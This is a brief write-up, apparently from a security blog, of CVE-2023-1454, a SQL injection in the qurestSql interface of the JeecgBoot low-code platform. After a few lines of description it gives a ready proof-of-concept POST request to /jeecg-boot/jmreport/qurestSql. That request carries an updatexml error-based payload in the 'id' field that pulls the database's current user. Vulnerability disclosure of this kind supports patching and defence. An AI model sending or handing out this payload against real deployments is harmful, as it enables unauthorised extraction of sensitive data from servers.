Jeecgboot Enterprise Level Low Code Platform Qurestsql Sql Injection Vulnerability Cve 2023 1454
Jeecgboot Enterprise Level Low Code Platform Qurestsql Sql Injection Vulnerability Cve 2023 1454
JeecgBoot Enterprise-level low-code platform qurestSql SQL injection vulnerability CVE-2023-1454
Vulnerability Description
JeecgBoot Enterprise-level low-code platform The qurestSql interface has a SQL injection vulnerability. The attacker can obtain sensitive data in the server database through the vulnerability, and further attack
Vulnerability Impact
JeecgBoot enterprise-level low-code platform
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Content-Type: application/json
{"apiSelectId":"1290104038414721025",
"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
This post is licensed under CC BY 4.0 by the author.